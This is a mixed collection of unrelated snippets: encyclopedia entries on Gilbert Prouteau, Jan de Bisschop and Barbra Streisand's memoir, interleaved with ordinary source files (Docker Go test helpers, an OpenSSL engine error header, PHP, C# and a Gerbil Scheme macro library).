Monsieur l'instituteur, Albin Michel, 2000
Victor Hugo vendéen, Mosée, 2002
Les Soleils de minuit, Editions Hérault, 2003
Rabelais en Vendée, D'Orbestier, 2004
Les Orgues d’Hélène, Écho Optique, 2007 (poems)
Le Roman de la Vendée, Geste, 2010
Les mots de passe, Editions du Petit Pavé, 2013
Filmography
La Vie passionnée de Georges Clemenceau (1953)
Dieu a choisi Paris (1969), with Jean-Paul Belmondo
Further reading
Chastagnol, Jean, ed. (1980). Le Roman d'un rebelle, Gilbert Prouteau. Paris: Diffusion De Vecchi. .
References
External links
Profile
1917 births
2012 deaths
People from Vendée
Olympic bronze medalists in art competitions
French male poets
20th-century French poets
French directors
Winners of the Prix Broquette-Gonin (literature)
Medalists at the 1948 Summer Olympics
20th-century French male writers
Olympic competitors in art competitions
|
```go
package container
import (
"fmt"
containertypes "github.com/docker/docker/api/types/container"
networktypes "github.com/docker/docker/api/types/network"
"github.com/docker/docker/api/types/strslice"
"github.com/docker/go-connections/nat"
)
// WithName sets the name of the container
func WithName(name string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Name = name
}
}
// WithLinks sets the links of the container
func WithLinks(links ...string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.HostConfig.Links = links
}
}
// WithImage sets the image of the container
func WithImage(image string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Config.Image = image
}
}
// WithCmd sets the comannds of the container
func WithCmd(cmds ...string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Config.Cmd = strslice.StrSlice(cmds)
}
}
// WithNetworkMode sets the network mode of the container
func WithNetworkMode(mode string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.HostConfig.NetworkMode = containertypes.NetworkMode(mode)
}
}
// WithExposedPorts sets the exposed ports of the container
func WithExposedPorts(ports ...string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Config.ExposedPorts = map[nat.Port]struct{}{}
for _, port := range ports {
c.Config.ExposedPorts[nat.Port(port)] = struct{}{}
}
}
}
// WithTty sets the TTY mode of the container
func WithTty(tty bool) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Config.Tty = tty
}
}
// WithWorkingDir sets the working dir of the container
func WithWorkingDir(dir string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.Config.WorkingDir = dir
}
}
// WithVolume sets the volume of the container
func WithVolume(name string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
if c.Config.Volumes == nil {
c.Config.Volumes = map[string]struct{}{}
}
c.Config.Volumes[name] = struct{}{}
}
}
// WithBind sets the bind mount of the container
func WithBind(src, target string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
c.HostConfig.Binds = append(c.HostConfig.Binds, fmt.Sprintf("%s:%s", src, target))
}
}
// WithIPv4 sets the specified ip for the specified network of the container
func WithIPv4(network, ip string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
if c.NetworkingConfig.EndpointsConfig == nil {
c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{}
}
if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil {
c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{}
}
if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil {
c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{}
}
c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv4Address = ip
}
}
// WithIPv6 sets the specified ip6 for the specified network of the container
func WithIPv6(network, ip string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
if c.NetworkingConfig.EndpointsConfig == nil {
c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{}
}
if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil {
c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{}
}
if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil {
c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{}
}
c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv6Address = ip
}
}
// WithLogDriver sets the log driver to use for the container
func WithLogDriver(driver string) func(*TestContainerConfig) {
return func(c *TestContainerConfig) {
if c.HostConfig == nil {
c.HostConfig = &containertypes.HostConfig{}
}
c.HostConfig.LogConfig.Type = driver
}
}
// WithAutoRemove sets the container to be removed on exit
func WithAutoRemove(c *TestContainerConfig) {
if c.HostConfig == nil {
c.HostConfig = &containertypes.HostConfig{}
}
c.HostConfig.AutoRemove = true
}
```
|
```objective-c
/*
* Generated by util/mkerr.pl DO NOT EDIT
*
* in the file LICENSE in the source distribution or at
* path_to_url
*/
#ifndef HEADER_ENGINEERR_H
# define HEADER_ENGINEERR_H
# ifndef HEADER_SYMHACKS_H
# include <openssl/symhacks.h>
# endif
# include <openssl/opensslconf.h>
# ifndef OPENSSL_NO_ENGINE
# ifdef __cplusplus
extern "C"
# endif
int ERR_load_ENGINE_strings(void);
/*
* ENGINE function codes.
*/
# define ENGINE_F_DIGEST_UPDATE 198
# define ENGINE_F_DYNAMIC_CTRL 180
# define ENGINE_F_DYNAMIC_GET_DATA_CTX 181
# define ENGINE_F_DYNAMIC_LOAD 182
# define ENGINE_F_DYNAMIC_SET_DATA_CTX 183
# define ENGINE_F_ENGINE_ADD 105
# define ENGINE_F_ENGINE_BY_ID 106
# define ENGINE_F_ENGINE_CMD_IS_EXECUTABLE 170
# define ENGINE_F_ENGINE_CTRL 142
# define ENGINE_F_ENGINE_CTRL_CMD 178
# define ENGINE_F_ENGINE_CTRL_CMD_STRING 171
# define ENGINE_F_ENGINE_FINISH 107
# define ENGINE_F_ENGINE_GET_CIPHER 185
# define ENGINE_F_ENGINE_GET_DIGEST 186
# define ENGINE_F_ENGINE_GET_FIRST 195
# define ENGINE_F_ENGINE_GET_LAST 196
# define ENGINE_F_ENGINE_GET_NEXT 115
# define ENGINE_F_ENGINE_GET_PKEY_ASN1_METH 193
# define ENGINE_F_ENGINE_GET_PKEY_METH 192
# define ENGINE_F_ENGINE_GET_PREV 116
# define ENGINE_F_ENGINE_INIT 119
# define ENGINE_F_ENGINE_LIST_ADD 120
# define ENGINE_F_ENGINE_LIST_REMOVE 121
# define ENGINE_F_ENGINE_LOAD_PRIVATE_KEY 150
# define ENGINE_F_ENGINE_LOAD_PUBLIC_KEY 151
# define ENGINE_F_ENGINE_LOAD_SSL_CLIENT_CERT 194
# define ENGINE_F_ENGINE_NEW 122
# define ENGINE_F_ENGINE_PKEY_ASN1_FIND_STR 197
# define ENGINE_F_ENGINE_REMOVE 123
# define ENGINE_F_ENGINE_SET_DEFAULT_STRING 189
# define ENGINE_F_ENGINE_SET_ID 129
# define ENGINE_F_ENGINE_SET_NAME 130
# define ENGINE_F_ENGINE_TABLE_REGISTER 184
# define ENGINE_F_ENGINE_UNLOCKED_FINISH 191
# define ENGINE_F_ENGINE_UP_REF 190
# define ENGINE_F_INT_CLEANUP_ITEM 199
# define ENGINE_F_INT_CTRL_HELPER 172
# define ENGINE_F_INT_ENGINE_CONFIGURE 188
# define ENGINE_F_INT_ENGINE_MODULE_INIT 187
# define ENGINE_F_OSSL_HMAC_INIT 200
/*
* ENGINE reason codes.
*/
# define ENGINE_R_ALREADY_LOADED 100
# define ENGINE_R_ARGUMENT_IS_NOT_A_NUMBER 133
# define ENGINE_R_CMD_NOT_EXECUTABLE 134
# define ENGINE_R_COMMAND_TAKES_INPUT 135
# define ENGINE_R_COMMAND_TAKES_NO_INPUT 136
# define ENGINE_R_CONFLICTING_ENGINE_ID 103
# define ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED 119
# define ENGINE_R_DSO_FAILURE 104
# define ENGINE_R_DSO_NOT_FOUND 132
# define ENGINE_R_ENGINES_SECTION_ERROR 148
# define ENGINE_R_ENGINE_CONFIGURATION_ERROR 102
# define ENGINE_R_ENGINE_IS_NOT_IN_LIST 105
# define ENGINE_R_ENGINE_SECTION_ERROR 149
# define ENGINE_R_FAILED_LOADING_PRIVATE_KEY 128
# define ENGINE_R_FAILED_LOADING_PUBLIC_KEY 129
# define ENGINE_R_FINISH_FAILED 106
# define ENGINE_R_ID_OR_NAME_MISSING 108
# define ENGINE_R_INIT_FAILED 109
# define ENGINE_R_INTERNAL_LIST_ERROR 110
# define ENGINE_R_INVALID_ARGUMENT 143
# define ENGINE_R_INVALID_CMD_NAME 137
# define ENGINE_R_INVALID_CMD_NUMBER 138
# define ENGINE_R_INVALID_INIT_VALUE 151
# define ENGINE_R_INVALID_STRING 150
# define ENGINE_R_NOT_INITIALISED 117
# define ENGINE_R_NOT_LOADED 112
# define ENGINE_R_NO_CONTROL_FUNCTION 120
# define ENGINE_R_NO_INDEX 144
# define ENGINE_R_NO_LOAD_FUNCTION 125
# define ENGINE_R_NO_REFERENCE 130
# define ENGINE_R_NO_SUCH_ENGINE 116
# define ENGINE_R_UNIMPLEMENTED_CIPHER 146
# define ENGINE_R_UNIMPLEMENTED_DIGEST 147
# define ENGINE_R_UNIMPLEMENTED_PUBLIC_KEY_METHOD 101
# define ENGINE_R_VERSION_INCOMPATIBILITY 145
# endif
#endif
```
|
```php
<?php
namespace App\Activities;
use App\Models\Activity;
class UserSubscribedBlog extends BaseActivity
{
public function generate($user, $blog)
{
$causer = 'u' . $user->id;
$indentifier = 'b' . $blog->id;
$data = array_merge([
'blog_name' => $blog->name,
'blog_link' => $blog->link(),
]);
$this->addActivity($causer, $user, $indentifier, $data);
}
public function remove($user, $blog)
{
$this->removeBy("u$user->id", "b$blog->id");
}
}
```
|
Jan de Bisschop, also known as Johannes Episcopius (1628–1671), was a lawyer, who became a Dutch Golden Age painter and engraver.
Biography
According to the RKD he learned to draw from Bartholomeus Breenbergh, and he influenced in his turn Jacob van der Ulft. Both Ulft and Bisschop were born into good families and were examples of painters who practised art more for pleasure than for a living. Bisschop was a founding member of the Confrerie Pictura and produced two books in the 1670s meant as instructional material for young artists. These were based on his own copies from classical artists, but also copies from the Rome-traveller, Pieter Donker. One was 112 prints that was produced in the years 1668-1669 as the Signorum Veterum Icones (Dutch title: Afbeeldingen van antieke beelden), and the other was printed in 1671 as Paradigmata Graphices variorum Artificum (Dutch title: Voor-beelden der Teken-Konst van verscheyde Meesters).
According to Houbraken he was a lawyer for the Dutch court, and did a great service to the arts with his instructional drawings copied from the artists Tintoretto, Jacopo Bassano, Annibale Carracci (Karats), Paolo Veronese, Rubens, and Anthony van Dyck.
References
Jan de Bisschop and his Icones & Paradigmata, classical antiquities and Italian drawings for artistic instruction in seventeenth century Holland, by J. G. van Gelder, 1985, Davaco
Jan de Bisschop in the RKD
External links
Vermeer and The Delft School, a full text exhibition catalog from The Metropolitan Museum of Art, which contains material on Jan de Bisschop
1628 births
1671 deaths
Dutch Golden Age painters
Dutch male painters
Painters from Amsterdam
Painters from The Hague
|
```smalltalk
using Ardalis.Result;
using Ardalis.SharedKernel;
namespace Clean.Architecture.UseCases.Contributors.Get;
public record GetContributorQuery(int ContributorId) : IQuery<Result<ContributorDTO>>;
```
|
My Name Is Barbra is the forthcoming memoir by American entertainer Barbra Streisand.
Background
Jacqueline Kennedy Onassis, while an editor at Doubleday, sought to publish Streisand's memoir in 1984. Streisand rejected the offer, feeling that at the age of 42, she was too young, and had more to achieve in the future. Streisand subsequently began making notes, then started a journal in longhand in 1999.
Viking Press announced in May 2015 that they would publish the long-awaited memoir, spanning Streisand's entire life and career, planned for release in 2017.
Publication
The book's release is slated for November 2023, spanning 992 pages in length. The book has no index as Streisand wishes for readers to engage with the book from beginning to end without browsing for specific terms.
Streisand narrates the audiobook edition, which features additional anecdotes.
References
Viking Press books
2023 non-fiction books
Upcoming books
American memoirs
Barbra Streisand
|
```scheme
;;; -*- Gerbil -*-
;;; (C) vyzo
;;; some standard sugar
(import :std/error
:std/hash-table)
(export
catch
finally
try
ignore-errors
with-destroy
defmethod/alias
using-method
with-methods
with-class-methods
with-class-method
while
until
hash
hash-eq
hash-eqv
let-hash
awhen
chain
is
with-id
with-id/expr
defsyntax/unhygienic
if-let
when-let
defcheck-argument-type
check-argument-boolean
check-argument-fixnum
check-argument-fx>=0
check-argument-vector
check-argument-u8vector
check-argument-string
check-argument-pair
check-argument-list
check-argument-procedure
syntax-eval
syntax-call
defsyntax-call)
(import (for-syntax :std/misc/func
:std/stxutil))
(defrules catch ())
(defrules finally ())
(defsyntax (try stx)
(def (generate-thunk body)
(if (null? body)
(raise-syntax-error #f "Bad syntax; missing body" stx)
(with-syntax (((e ...) (reverse body)))
#'(lambda () e ...))))
(def (generate-fini thunk fini)
(with-syntax ((thunk thunk)
((e ...) fini))
#'(with-unwind-protect thunk (lambda () e ...))))
(def (generate-catch handlers thunk)
(with-syntax (($e (genident)))
(let lp ((rest handlers) (clauses []))
(match rest
([hd . rest]
(syntax-case hd (=>)
((pred => K)
(lp rest (cons #'(((? pred) $e) => K)
clauses)))
(((pred var) body ...)
(identifier? #'var)
(lp rest (cons #'(((? pred) $e) (let ((var $e)) body ...))
clauses)))
(((var) body ...)
(identifier? #'var)
(lp rest (cons #'(#t (let ((var $e)) body ...))
clauses)))
((us body ...)
(underscore? #'us)
(lp rest (cons #'(#t (begin body ...))
clauses)))))
(else
(with-syntax (((clause ...) clauses)
(thunk thunk))
#'(with-catch
(lambda ($e) (cond clause ... (else (raise $e))))
thunk)))))))
(syntax-case stx ()
((_ e ...)
(let lp ((rest #'(e ...)) (body []))
(syntax-case rest ()
((hd . rest)
(syntax-case #'hd (catch finally)
((finally fini ...)
(if (stx-null? #'rest)
(generate-fini (generate-thunk body) #'(fini ...))
(raise-syntax-error #f "Misplaced finally clause" stx)))
((catch handler ...)
(let lp ((rest #'rest) (handlers [#'(handler ...)]))
(syntax-case rest (catch finally)
(((catch handler ...) . rest)
(lp #'rest [#'(handler ...) . handlers]))
(((finally fini ...))
(with-syntax ((body (generate-catch handlers (generate-thunk body))))
(generate-fini #'(lambda () body) #'(fini ...))))
(()
(generate-catch handlers (generate-thunk body))))))
(_ (lp #'rest (cons #'hd body)))))
(() ; no clauses, just a begin
(cons 'begin (reverse body))))))))
(defrule (ignore-errors form ...) (with-catch false (lambda () form ...)))
(defrule (with-destroy obj body ...)
(let ($obj obj)
(try body ... (finally {destroy $obj}))))
(defsyntax (defmethod/alias stx)
(syntax-case stx (@method)
((_ {method (alias ...) type} body ...)
(and (identifier? #'method)
(stx-andmap identifier? #'(alias ...))
(syntax-local-class-type-info? #'type))
(with-syntax* (((values klass) (syntax-local-value #'type))
(type::t (!class-type-descriptor klass))
(method-impl (stx-identifier #'method #'type "::" #'method)))
#'(begin
(defmethod {method type} body ...)
(bind-method! type::t 'alias method-impl) ...)))))
(defrules using-method ()
((_ obj method)
(identifier? #'method)
(def method (checked-bound-method-ref obj 'method)))
((_ obj (method method-id))
(and (identifier? #'method) (identifier? #'method-id))
(def method (checked-bound-method-ref obj 'method-id))))
(defrule (with-methods o method ...)
(begin
(def $klass (object-type o))
(with-class-methods $klass method ...)))
(defrule (with-class-methods klass method ...)
(begin (with-class-method klass method) ...))
(defrules with-class-method ()
((_ klass (method method-id))
(and (identifier? #'method) (identifier? #'method-id))
(def method
(cond
((find-method klass #f 'method-id))
(else
(error "Missing method" klass 'method-id)))))
((recur klass method)
(identifier? #'method)
(recur klass (method method))))
(defrule (while test body ...)
(let lp ()
(when test
body ...
(lp))))
(defrule (until test body ...)
(let lp ()
(unless test
body ...
(lp))))
(defrule (hash (key val) ...)
(~hash-table make-hash-table (key val) ...))
(defrule (hash-eq (key val) ...)
(~hash-table make-hash-table-eq (key val) ...))
(defrule (hash-eqv (key val) ...)
(~hash-table make-hash-table-eqv (key val) ...))
(defsyntax (~hash-table stx)
(syntax-case stx ()
((_ make-ht clause ...)
(with-syntax* ((size (stx-length #'(clause ...)))
(((key val) ...) #'(clause ...)))
#'(let (ht (make-ht size: size))
(hash-put! ht `key val) ...
ht)))))
;; the hash deconstructor macro
;; usage: (let-hash a-hash body ...)
;; rebinds %%ref so that identifiers starting with a dot are looked up in the hash:
;; .x -> (hash-ref a-hash 'x) ; strong accessor
;; .?x -> (hash-get a-hash 'x) ; weak accessor
;; .$x -> (hash-get a-hash "x") ; string weak accessor
;; ..x -> (%%ref .x) ; escape
(defsyntax (let-hash stx)
(syntax-case stx ()
((macro expr body ...)
(with-syntax ((@ref (stx-identifier #'macro '%%ref)))
#'(let (ht (: expr HashTable))
(let-syntax
((var-ref
(syntax-rules ()
((_ id) (@ref id)))))
(let-syntax
((@ref
(lambda (stx)
(syntax-case stx ()
((_ id)
(let (str (symbol->string (stx-e #'id)))
(def (str->symbol start)
(string->symbol (substring str start (string-length str))))
(def (substr start)
(substring str start (string-length str)))
(if (eq? (string-ref str 0) #\.) ; hash accessor?
(cond
((eq? (string-ref str 1) #\.) ; escape
(with-syntax ((sym (str->symbol 1)))
#'(var-ref sym)))
((eq? (string-ref str 1) #\?) ; weak
(with-syntax ((sym (str->symbol 2)))
#'(hash-get ht 'sym)))
((eq? (string-ref str 1) #\$) ; string weak
(with-syntax ((sub (substr 2)))
#'(hash-get ht 'sub)))
(else
(with-syntax ((sym (str->symbol 1)))
#'(hash-ref ht 'sym))))
#'(var-ref id))))))))
body ...)))))))
(defrule (awhen (id test) body ...)
(let (id test)
(when id body ...)))
;; chain rewrites passed expressions by passing the previous expression
;; into the position of the <> diamond symbol. In case a previous expression
;; should be used in a sub-expression, or multiple times, the expression can
;; be prefixed with a variable (supports destructuring).
;;
;; When the first expression is a <>, chain will return a unary lambda.
;;
;; Example:
;; (chain [1 2 3]
;; ([_ . rest] (map number->string rest))
;; (v (string-join v ", "))
;; (string-append <> " :)"))
;; => "2, 3 :)"
(defrules chain (<>)
((_ <> exp exp* ...)
(lambda (init)
(~chain-wrap-fn init (exp exp* ...))))
((_ init exp exp* ...)
(~chain-wrap-fn init (exp exp* ...)))
((_ <>) (lambda (init) init))
((_ init) init))
;; ~chain-wrap-fn is an auxiliary macro to wrap unary procedures which
;; have no parentheses around with parentheses: proc -> (proc) to
;; distinguish them later in ~chain-aux.
(defrules ~chain-wrap-fn ()
((_ init () previous)
(~chain-aux previous init))
((_ init ((proc arg arg* ...) . more))
(~chain-wrap-fn init more ((proc arg arg* ...))))
((_ init ((proc arg arg* ...) . more) (previous ...))
(~chain-wrap-fn init more (previous ... (proc arg arg* ...))))
((_ init (proc . more))
(~chain-wrap-fn init more ((proc))))
((_ init (proc . more) (previous ...))
(~chain-wrap-fn init more (previous ... (proc)))))
;; ~chain-aux is an auxiliary macro which takes a list of expressions
;; and the initial chain value. It then loops over the expression list
;; and transforms one expression after the other.
(defrules ~chain-aux (<>)
((_ () previous)
previous)
((_ ((var ()) . more) previous)
(syntax-error "Body expression cannot be empty"))
;; variable
((_ ((var (body1 body2 . body*)) . more) previous)
(~chain-aux more
(~chain-aux-variable (var previous) (body1 body2 . body*))))
((_ ((var (body1 body2 . body*) (body-error ...) ...) . more) previous)
(syntax-error "More than one body expression in chain-variable context"))
;; unary procedure
((_ ((fn) . more) previous)
(~chain-aux more (fn previous)))
;; diamond
((_ ((fn . args) . more) previous)
(~chain-aux more
(~chain-aux-diamond (fn . args) () previous))))
;; ~chain-aux-variable is an auxiliary macro that transforms
;; the passed expression into a with-expression.
(defrules ~chain-aux-variable ()
((_ (() (fn . args)) body)
(syntax-error "The variable must be non-empty"))
((_ (var previous) body)
(with ((var previous)) body)))
;; ~chain-aux-diamond is an auxiliary macro that replaces the <> symbol
;; with the previous expressions. There must be only one <> diamond in a row
;; and it must be in the top-level expression.
(defrules ~chain-aux-diamond (<>)
((_ () acc)
acc)
((_ () acc previous)
(syntax-error "No diamond operator in expression"))
((_ (<> . more) (acc ...))
(syntax-error "More than one diamond operator in expression"))
((_ (<> . more) (acc ...) previous)
(~chain-aux-diamond more (acc ... previous)))
((_ (v . more) (acc ...) . previous) ; previous is not set after <> was replaced
(~chain-aux-diamond more (acc ... v) . previous)))
;; is converts a given value into a predicate testing for the presence of the
;; given value. Optionally a transforming procedure can prefix the value, which
;; can in this case also be a procedure. This allows to 'get' a value out of a
;; compound data structure before comparison (first map, then test).
;; For numbers, char and string specialized procedures are used automatically
;; if passed to the macro as value and not as variable. Alternatively, the
;; test: keyword can be used to supply a test, the default is equal?.
;;
;; Example:
;; (find (is cdr 5) '((a . 2) (b . 5) (c . 6)))
;; => (b . 5)
;;
;; (filter (is file-type 'regular) (directory-files))
;; => ("Documents" "Pictures" "Videos" "Music")
(defrules is ()
((_ proc n)
(stx-number? #'n)
(~is-helper proc number? = n))
((_ proc c)
(stx-char? #'c)
(lambda (v) (eqv? c (proc v))))
((_ proc s)
(stx-string? #'s)
(~is-helper proc string? string=? s))
((_ proc other)
(if (procedure? other)
(lambda (v) (other (proc v)))
(lambda (v) (equal? other (proc v)))))
((_ proc other test: test)
(if (procedure? other)
(lambda (v) (other (proc v)))
(lambda (v) (test other (proc v)))))
((_ n)
(stx-number? #'n)
(~is-helper number? = n))
((_ c)
(stx-char? #'c)
(lambda (v) (eqv? c v)))
((_ s)
(stx-string? #'s)
(~is-helper string? string=? s))
((_ v1)
(lambda (v2) (equal? v1 v2)))
((_ v1 test: test)
(lambda (v2) (test v1 v2))))
(defrules ~is-helper ()
((_ proc type-test value-test arg)
(chain <>
(proc <>)
(v (and (type-test v) (value-test arg v)))))
((_ type-test value-test arg)
(chain <>
(v (and (type-test v) (value-test arg v))))))
;;; Easier identifier introduction
(defrules defsyntax/unhygienic ()
((_ (m-id stx) body ...)
(defsyntax m-id (compose syntax-local-introduce (lambda (stx) body ...) syntax-local-introduce)))
((_ m-id f-expr) (identifier? #'m-id)
(defsyntax m-id (compose syntax-local-introduce f-expr syntax-local-introduce))))
;; Written with the precious help of Alex Knauth
(defsyntax (with-id stx)
(syntax-case stx ()
((wi (id-spec ...) body ...)
#'(wi wi (id-spec ...) body ...))
((wi ctx (id-spec ...) body body1 body+ ...)
(identifier? #'ctx)
#'(wi ctx (id-spec ...) (begin body body1 body+ ...)))
((_ ctx (id-spec ...) template)
(identifier? #'ctx)
(with-syntax ((((id expr) ...)
(stx-map (lambda (spec) (syntax-case spec ()
((id) #'(id 'id))
((id str1 str2 ...) #'(id (list str1 str2 ...)))
(id (identifier? #'id) #'(id 'id))))
#'(id-spec ...))))
#'(begin
(defsyntax/unhygienic (m stx2)
(with-syntax ((id (stx-identifier (stx-car (stx-cdr stx2)) expr)) ...)
(... #'(... template))))
(m ctx))))))
(defrule (with-id/expr stuff ...) (let () (with-id stuff ...)))
(defrules if-let ()
((_ () then else) then)
((_ ((id expr)) then else) (if-let (id expr) then else))
((_ ((id expr) ...) then else)
(let/cc return
(def (fail) (return else))
(let* ((id (or expr (fail))) ...)
then)))
((_ (id expr) then else)
(let (test expr) (if test (let (id test) then) else))))
(defrule (when-let bindings body ...)
(if-let bindings (begin body ...) (void)))
(defrule (defcheck-argument-type type ...)
(begin
(with-id type ((pred? #'type "?")
(check "check-argument-" #'type)
(a #'type "-instance")) ; go get location for context
(defrule (check a (... ...))
(begin (check-argument (pred? a) (symbol->string 'type) a) (... ...)))) ...))
(defcheck-argument-type boolean)
(defcheck-argument-type fixnum)
(defcheck-argument-type fx>=0)
(defcheck-argument-type vector)
(defcheck-argument-type u8vector)
(defcheck-argument-type string)
(defcheck-argument-type pair)
(defcheck-argument-type list)
(defcheck-argument-type procedure)
(defsyntax (syntax-eval stx)
(syntax-case stx () ((_ expr) #'(let () (defsyntax (foo _) expr) (foo)))))
(defsyntax (syntax-call stx)
(syntax-case stx ()
((ctx expr) #'(ctx expr ctx))
((_ expr ctx args ...)
#'(let ()
(defsyntax (foo stx)
(datum->syntax (stx-car (stx-cdr stx)) (apply expr (syntax->list (stx-cdr stx)))))
(foo ctx args ...)))))
(defrule (defsyntax-call (macro ctx formals ...) body ...)
(defsyntax (macro stx)
(syntax-case stx ()
((_ ctx formals ...)
(datum->syntax (stx-car (stx-cdr stx))
(apply (lambda (ctx formals ...) body ...)
(stx-car (stx-cdr stx)) (syntax->datum (stx-cdr (stx-cdr stx))))))
((ctx formals ...) #'(ctx ctx formals ...)))))
```
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.